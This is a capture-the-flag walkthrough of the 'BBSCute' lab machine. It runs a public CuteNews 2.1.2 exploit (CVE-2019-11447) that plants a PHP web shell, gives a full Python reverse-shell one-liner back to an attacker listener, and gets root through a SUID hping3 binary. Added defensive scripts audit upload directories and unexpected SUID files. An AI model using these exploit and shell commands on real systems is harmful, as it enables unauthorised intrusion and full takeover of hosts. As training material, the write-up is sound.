BBSCute - Easy
Enumeration
Nmap
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 192.168.129.128
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 08:56 +0630
Nmap scan report for 192.168.129.128
Host is up (0.29s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 404 Not Found
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: STLS LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: TOP LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-09-17T16:28:06
|_Not valid after: 2021-09-17T16:28:06
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.67 seconds
Directory Scanning
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ sudo dirsearch -u http://192.168.129.128 -w /opt/SecLists/Discovery/Web-Content/common.txt -r -t 60 --full-url
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 60 | Wordlist size: 4686
Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/192.168.129.128/_21-11-07_09-27-56.txt
Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-11-07_09-27-56.log
Target: http://192.168.129.128/
[09:27:57] Starting:
[09:28:14] 301 - 317B - http://192.168.129.128/core -> http://192.168.129.128/core/ (Added to queue)
[09:28:16] 301 - 317B - http://192.168.129.128/docs -> http://192.168.129.128/docs/ (Added to queue)
[09:28:17] 200 - 1KB - http://192.168.129.128/favicon.ico
[09:28:20] 200 - 10KB - http://192.168.129.128/index.html
[09:28:20] 200 - 6KB - http://192.168.129.128/index.php
[09:28:21] 301 - 317B - http://192.168.129.128/libs -> http://192.168.129.128/libs/ (Added to queue)
[09:28:22] 301 - 319B - http://192.168.129.128/manual -> http://192.168.129.128/manual/ (Added to queue)
[09:28:29] 403 - 280B - http://192.168.129.128/server-status
[09:28:31] 301 - 318B - http://192.168.129.128/skins -> http://192.168.129.128/skins/ (Added to queue)
[09:28:34] 301 - 320B - http://192.168.129.128/uploads -> http://192.168.129.128/uploads/ (Added to queue)
[09:28:37] Starting: core/
[09:28:47] 301 - 325B - http://192.168.129.128/core/captcha -> http://192.168.129.128/core/captcha/ (Added to queue)
[09:28:47] 301 - 326B - http://192.168.129.128/core/ckeditor -> http://192.168.129.128/core/ckeditor/ (Added to queue)
[09:28:49] 301 - 320B - http://192.168.129.128/core/db -> http://192.168.129.128/core/db/ (Added to queue)
[09:28:54] 301 - 326B - http://192.168.129.128/core/includes -> http://192.168.129.128/core/includes/ (Added to queue)
[09:28:55] 200 - 0B - http://192.168.129.128/core/index.html
[09:28:56] 301 - 322B - http://192.168.129.128/core/lang -> http://192.168.129.128/core/lang/ (Added to queue)
[09:28:58] 301 - 325B - http://192.168.129.128/core/modules -> http://192.168.129.128/core/modules/ (Added to queue)
[09:29:07] 301 - 323B - http://192.168.129.128/core/tools -> http://192.168.129.128/core/tools/ (Added to queue)
Web
Default install page for Apache on port 80.
In index.php, we got a login page.
I tried default credentials and some SQL injection, but nothing worked. So let's create a new user.
As you can see, we need a captcha to register an account, but it does not load on the page.
But in the source code we can see captcha.php. When we open that, we get the captcha text.
We can use this captcha to register an account.
Finding Exploit
At the bottom of the page, we can see that it is running CuteNews 2.1.2. When I googled this, I found an exploit for it.
Clone this repo and run it:
python3 CVE-2019-11447.py <username> <pass> http://IP/index.php
┌─[sheinn101@parrot]─[~/offsec/BBSCute/CVE-2019-11447-POC]
└──╼ [??]$ python3 CVE-2019-11447.py shein shein http://192.168.129.128/index.php
-.-. --- --- .-.. .... ....- -..- --- .-. -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as shein:shein
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: eb376c517713a1ebc76154a292a7044f-shein
[+] __signature_dsi: 7a551d498ea9f93dbe638fcfd9e71f34
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.129.128/uploads/avatar_shein_31095.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR
$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$>
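An added example from the defender's side (not part of the write-up or of the PoC script it runs): the avatar path the PoC reports ends in .php and sits under a web-served uploads/ directory, so a routine audit of that directory for files that carry a server-executable extension, are not real images, or contain a PHP open tag would have flagged it. The directory layout, file names and file contents below are constructed.

```python
import os
import tempfile

# Magic bytes of the image formats an avatar field should accept.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
# Extensions that Debian's stock Apache/PHP setup hands to the PHP interpreter.
SERVER_EXEC_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}


def classify_upload(path):
    """Return the findings for one file; an empty list means it looks like a plain image."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as f:
        head = f.read(4096)
    if ext in SERVER_EXEC_EXT:
        findings.append("server-executable extension")
    if not head.startswith(IMAGE_MAGIC):
        findings.append("not a recognised image")
    if b"<?php" in head or b"<?=" in head:
        findings.append("contains PHP open tag")
    return findings


def audit_uploads(directory):
    """Walk an uploads directory and map each suspicious file to its findings."""
    report = {}
    for root, _, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            findings = classify_upload(full)
            if findings:
                report[os.path.relpath(full, directory)] = findings
    return report


def demo():
    """Constructed sample tree: one real-looking PNG avatar and one PHP file
    named after the avatar_<user>_<n>.php pattern seen in the write-up."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "avatar_alice_1.png"), "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        with open(os.path.join(d, "avatar_shein_31095.php"), "wb") as f:
            f.write(b"<?php echo 'constructed sample'; ?>")  # harmless stand-in content
        return audit_uploads(d)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", ", ".join(findings))
```

Pointing audit_uploads at the real uploads/ directory on a cron job gives a cheap detection; denying PHP execution under uploads/ in the Apache vhost removes the impact entirely.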
Getting Reverse Shell
Now we have a shell. To get a stable shell, listen with netcat and run the following command:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
┌─[sheinn101@parrot]─[~/offsec/BBSCute]
└──╼ [??]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [192.168.49.135] from (UNKNOWN) [192.168.135.128] 35872
which python
which python
/usr/bin/python
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cute:/var/www/html/uploads$
Now we have a stable shell. As this is an easy box, let's find which binaries have the SUID bit set.
Privilege Escalation
find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/mount
/usr/sbin/hping3
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
www-data@cute:/home/fox$
We can see hping3 has the SUID bit. Looking up hping3 on GTFOBins shows the following. Since hping3 already has the SUID bit, we don't need sudo. Run hping3 and type /bin/bash -p.
hping3
/bin/bash -p
/bin/bash -p
id; whoami
id; whoami
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
root
bash-5.0#
Now we pwned it.
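As an added defender-side check (not from the write-up or from any tool it uses), this audit reproduces the find step and diffs the result against the set-uid binaries a stock Debian 10 install is expected to have. The allowlist is my assumption, taken from every entry in the list above except hping3, and the sample input is constructed from the write-up's find output.

```python
import os
import stat

# SUID binaries a stock Debian 10 install ships set-uid root (assumption: every
# entry in the write-up's find output except hping3). Anything else is a finding.
DEBIAN10_EXPECTED_SUID = {
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/pkexec", "/usr/bin/sudo", "/usr/bin/umount", "/usr/bin/newgrp",
    "/usr/bin/fusermount", "/usr/bin/passwd", "/usr/bin/mount",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
}

def find_suid(root="/"):
    """Live equivalent of `find / -perm -4000`: regular files with the set-uid bit."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable or vanished entry, skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return hits

def unexpected_suid(paths, allowlist=DEBIAN10_EXPECTED_SUID):
    """Return (path, remediation) pairs for SUID files not on the allowlist,
    sorted, so the report doubles as a fix list."""
    return [(p, f"chmod u-s {p}") for p in sorted(set(paths) - allowlist)]

# Constructed sample: a subset of the find output shown in the write-up.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/sbin/hping3
/usr/lib/openssh/ssh-keysign
"""

def parse_find_output(text):
    return [line.strip() for line in text.splitlines() if line.strip()]

if __name__ == "__main__":
    for path, fix in unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)):
        print(f"unexpected SUID binary: {path}  (remediate: {fix})")
```

Replace the constructed sample with find_suid() to run it against a live host; the allowlist should be regenerated from a known-good image of the same distribution release.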